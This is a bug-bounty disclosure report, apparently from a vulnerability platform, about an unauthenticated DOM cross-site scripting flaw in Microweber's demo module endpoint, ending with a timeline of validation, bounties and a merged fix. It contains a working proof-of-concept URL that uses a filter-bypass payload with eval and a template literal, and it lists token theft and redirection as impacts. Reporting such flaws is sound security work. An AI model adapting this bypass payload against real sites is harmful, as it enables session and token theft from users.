Cross-site scripting - DOM in microweber/microweber

Valid

Reported on

Jul 7th 2022


Description

DOM XSS with filter bypass on /demo/module/ using type parameter without authentication.

Proof of Concept

https://demo.microweber.org/demo/module/?type=files/xss%27;eval.call`${%27alert\x28window.origin\x29%27}`;//&live_edit=true&remeber_path=true&ui=basic&start_path=media_host_base&from_admin=true&file_types=images&id=mw_admin_pictures_upload_browse_existing_modaledit-post-gallery-main&from_url=http://google.com/

PoC Image

image

Impact

The attacker can:

  • Steal token to perform CSRF.
  • Fetch contents from same-site page.
  • Redirect user. ...
We are processing your report and will contact the microweber team within 24 hours. a month ago
Nhien.IT modified the report
a month ago
Nhien.IT modified the report
a month ago
Nhien.IT modified the report
a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 79c691 a month ago
Peter Ivanov has been awarded the fix bounty
to join this conversation